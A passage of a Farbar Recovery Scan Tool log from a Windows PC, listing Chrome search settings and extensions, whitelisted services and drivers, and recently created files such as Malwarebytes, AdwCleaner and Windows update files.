CHR DefaultSearchURL: Default -> hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11908&prt=cr
CHR DefaultSearchKeyword: Default -> NortonSafe
CHR DefaultSuggestURL: Default -> hxxps://ss-sym.search.ask.com/ss?q={searchTerms}&li=ff
CHR Profile: C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default [2016-11-12]
CHR Extension: (Google Slides) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-22]
CHR Extension: (Google Docs) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-22]
CHR Extension: (Google Drive) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-22]
CHR Extension: (YouTube) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-22]
CHR Extension: (Norton Security Toolbar) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-09-17]
CHR Extension: (Google Search) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-22]
CHR Extension: (Google Sheets) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14]
CHR Extension: (Norton Identity Safe) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-02-22]
CHR Extension: (Norton Safe) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmgcfemagnogdodbambjhdcmfcpicngl [2016-09-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Gmail) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-22]
CHR Extension: (Chrome Media Router) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-28]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-15]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-15]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AMD_RAIDXpert; C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpertService.exe [122880 2009-12-15] (AMD) [File not signed]
S4 AsSysCtrlService; C:\ProgramData\ASUS\AsSysCtrlService\2.00.00\AsSysCtrlService.exe [96896 2009-12-28] (ASUSTeK Computer Inc.)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2829552 2016-03-08] (Microsoft Corporation)
S4 DiskDoctorService; C:\Program Files (x86)\Symantec\Norton Utilities 16\Tools\Disk Doctor\DiskDoctorSrv.exe [1147424 2012-09-29] (Symantec Corporation)
R2 dsNcService; C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe [674136 2015-10-22] (Pulse Secure, LLC)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [29728 2016-08-15] (HP Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\NS.exe [289080 2016-09-23] (Symantec Corporation)
S4 NU16StartManagerSvc; C:\Program Files (x86)\Symantec\Norton Utilities 16\sMonitor\StartManSvc.exe [792608 2012-09-29] (Symantec)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S3 Soda PDF Desktop; C:\Program Files\Soda PDF Desktop\ws.exe [2529744 2016-10-21] (LULU SOFTWARE LIMITED)
S3 Soda PDF Desktop CrashHandler; C:\Program Files\Soda PDF Desktop\crash-handler-ws.exe [925648 2016-10-21] (LULU SOFTWARE LIMITED)
R2 Soda PDF Desktop Creator; C:\Program Files\Soda PDF Desktop\creator-ws.exe [733648 2016-10-21] (LULU SOFTWARE LIMITED)
S4 SpeedDiskService; C:\Program Files (x86)\Symantec\Norton Utilities 16\Tools\SpeedDisk\SpeedDiskSrv.exe [1160224 2012-09-29] (Symantec Corporation)
S4 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [27760 2011-11-11] (VIA Technologies, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-23] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [13368 2009-07-05] ()
R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\BASHDefs\20161102.001\BHDrvx64.sys [1854712 2016-08-18] (Symantec Corporation)
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1608000.032\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-04] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\IPSDefs\20161111.001\IDSvia64.sys [1012952 2016-10-27] (Symantec Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-11-12] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-07-16] ()
S3 SRTSP; C:\Windows\System32\Drivers\NSx64\1608000.032\SRTSP64.SYS [784624 2016-09-23] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1608000.032\SRTSPX64.SYS [49400 2016-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1608000.032\SYMEFASI64.SYS [1628888 2016-09-23] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100592 2016-10-15] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1608000.032\Ironx64.SYS [289520 2016-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1608000.032\SYMNETS.SYS [567512 2016-09-23] (Symantec Corporation)
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\EX64.SYS [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-12 19:54 - 2016-11-12 19:54 - 00020468 _____ C:\Users\Dale\Desktop\FRST.txt
2016-11-12 19:37 - 2016-11-12 19:37 - 00003518 _____ C:\Users\Dale\Desktop\Malwarebytes scan log.txt
2016-11-12 19:26 - 2016-11-12 19:34 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-12 19:25 - 2016-11-12 19:25 - 00001122 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-11-12 19:25 - 2016-11-12 19:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-12 19:25 - 2016-11-12 19:25 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-11-12 19:25 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-11-12 19:25 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-12 19:25 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-11-12 19:08 - 2016-11-12 19:08 - 00002396 _____ C:\Users\Dale\Desktop\JRT.txt
2016-11-12 18:57 - 2016-11-12 19:02 - 00000000 ____D C:\AdwCleaner
2016-11-12 18:56 - 2016-11-12 18:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-11-12 18:54 - 2016-11-12 18:54 - 22851472 _____ (Malwarebytes ) C:\Users\Dale\Desktop\mbam-setup-2.2.1.1043.exe
2016-11-12 18:49 - 2016-11-12 18:49 - 01631928 _____ (Malwarebytes) C:\Users\Dale\Desktop\JRT.exe
2016-11-12 18:45 - 2016-11-12 18:45 - 03910208 _____ C:\Users\Dale\Desktop\adwcleaner_6.030.exe
2016-11-12 18:39 - 2016-11-12 18:40 - 00023388 _____ C:\Users\Dale\Desktop\Fixlog.txt
2016-11-12 17:37 - 2016-11-12 17:38 - 00073238 _____ C:\Users\Dale\Downloads\FRST.txt
2016-11-12 17:37 - 2016-11-12 17:38 - 00036376 _____ C:\Users\Dale\Downloads\Addition.txt
2016-11-12 17:31 - 2016-11-12 17:31 - 02411520 _____ (Farbar) C:\Users\Dale\Desktop\FRST64.exe
2016-11-12 17:26 - 2016-11-12 19:54 - 00000000 ____D C:\FRST
2016-11-12 17:26 - 2016-11-12 17:26 - 02411520 _____ (Farbar) C:\Users\Dale\Downloads\FRST64.exe
2016-11-08 18:09 - 2016-11-08 18:09 - 00000784 _____ C:\Users\Public\Desktop\Soda PDF Desktop.lnk
2016-11-08 18:07 - 2016-11-08 19:35 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Soda PDF Desktop
2016-11-08 18:07 - 2016-11-08 18:15 - 00000000 ____D C:\Program Files\Soda PDF Desktop
2016-11-08 18:07 - 2016-11-08 18:08 - 00000000 ____D C:\Program Files (x86)\Soda PDF Desktop
2016-11-08 18:07 - 2016-11-08 18:07 - 00000000 ____D C:\Users\Dale\Documents\Soda PDF Files
2016-11-08 18:07 - 2016-11-08 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Soda PDF Desktop
2016-11-08 18:04 - 2016-11-08 18:15 - 00000000 ____D C:\ProgramData\Soda PDF Desktop
2016-11-08 15:57 - 2016-11-02 09:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-11-08 15:57 - 2016-11-02 09:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-08 15:57 - 2016-11-02 09:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-11-08 15:57 - 2016-11-02 09:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-11-08 15:57 - 2016-11-02 09:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-11-08 15:57 - 2016-11-02 08:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-08 15:57 - 2016-10-27 21:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-11-08 15:57 - 2016-10-27 21:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-11-08 15:57 - 2016-10-27 13:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-11-08 15:57 - 2016-10-27 13:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-11-08 15:57 - 2016-10-27 12:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-11-08 15:57 - 2016-10-27 12:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-11-08 15:57 - 2016-10-27 12:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-11-08 15:57 - 2016-10-27 12:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-11-08 15:57 - 2016-10-27 12:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-11-08 15:57 - 2016-10-27 12:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-11-08 15:57 - 2016-10-27 12:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-11-08 15:57 - 2016-10-27 12:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-11-08 15:57 - 2016-10-27 12:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-11-08 15:57 - 2016-10-27 12:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-11-08 15:57 - 2016-10-27 12:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-11-08 15:57 - 2016-10-27 12:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-11-08 15:57 - 2016-10-27 12:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-11-08 15:57 - 2016-10-27 12:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-11-08 15:57 - 2016-10-27 12:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-11-08 15:57 - 2016-10-27 12:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-11-08 15:57 - 2016-10-27 12:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-11-08 15:57 - 2016-10-27 12:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-11-08 15:57 - 2016-10-27 12:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-11-08 15:57 - 2016-10-27 12:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-11-08 15:57 - 2016-10-27 12:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-11-08 15:57 - 2016-10-27 12:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-11-08 15:57 - 2016-10-27 12:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-11-08 15:57 - 2016-10-27 11:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-11-08 15:57 - 2016-10-27 11:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-11-08 15:57 - 2016-10-27 11:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-11-08 15:57 - 2016-10-27 11:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-11-08 15:57 - 2016-10-27 11:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-11-08 15:57 - 2016-10-27 11:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-11-08 15:57 - 2016-10-27 11:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-11-08 15:57 - 2016-10-27 11:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-11-08 15:57 - 2016-10-27 10:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-11-08 15:57 - 2016-10-27 09:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-11-08 15:57 - 2016-10-25 09:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-11-08 15:57 - 2016-10-22 11:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-11-08 15:57 - 2016-10-22 11:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-11-08 15:57 - 2016-10-22 11:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-11-08 15:57 - 2016-10-22 11:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-11-08 15:57 - 2016-10-22 11:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-11-08 15:57 - 2016-10-22 11:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-11-08 15:57 - 2016-10-22 11:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-11-08 15:57 - 2016-10-22 11:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-11-08 15:57 - 2016-10-22 11:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-11-08 15:57 - 2016-10-22 11:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-11-08 15:57 - 2016-10-22 11:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-11-08 15:57 - 2016-10-22 11:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-11-08 15:57 - 2016-10-22 11:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-11-08 15:57 - 2016-10-22 11:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-11-08 15:57 - 2016-10-22 11:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-11-08 15:57 - 2016-10-22 11:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-11-08 15:57 - 2016-10-22 10:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-11-08 15:57 - 2016-10-22 10:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-11-08 15:57 - 2016-10-22 10:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-11-08 15:57 - 2016-10-22 10:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-11-08 15:57 - 2016-10-22 10:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-11-08 15:57 - 2016-10-22 10:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-11-08 15:57 - 2016-10-22 10:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-11-08 15:57 - 2016-10-22 10:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-11-08 15:57 - 2016-10-22 10:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-11-08 15:57 - 2016-10-22 10:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-11-08 15:57 - 2016-10-22 10:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-11-08 15:57 - 2016-10-22 10:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-11-08 15:57 - 2016-10-22 10:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-11-08 15:57 - 2016-10-15 09:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-11-08 15:57 - 2016-10-15 09:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-11-08 15:57 - 2016-10-15 09:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-11-08 15:57 - 2016-10-15 09:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-11-08 15:57 - 2016-10-11 09:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2016-11-08 15:57 - 2016-10-11 09:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME
2016-11-08 15:57 - 2016-10-11 09:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-11-08 15:57 - 2016-10-11 09:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2016-11-08 15:57 - 2016-10-11 09:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
2016-11-08 15:57 - 2016-10-11 09:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME
2016-11-08 15:57 - 2016-10-11 09:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-11-08 15:57 - 2016-10-11 09:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL
2016-11-08 15:57 - 2016-10-11 09:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll
2016-11-08 15:57 - 2016-10-11 09:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime
2016-11-08 15:57 - 2016-10-11 07:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll
2016-11-08 15:57 - 2016-10-11 07:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2016-11-08 15:57 - 2016-10-10 09:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-11-08 15:57 - 2016-10-10 09:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-11-08 15:57 - 2016-10-10 09:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-11-08 15:57 - 2016-10-10 09:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-11-08 15:57 - 2016-10-10 09:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-11-08 15:57 - 2016-10-10 09:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
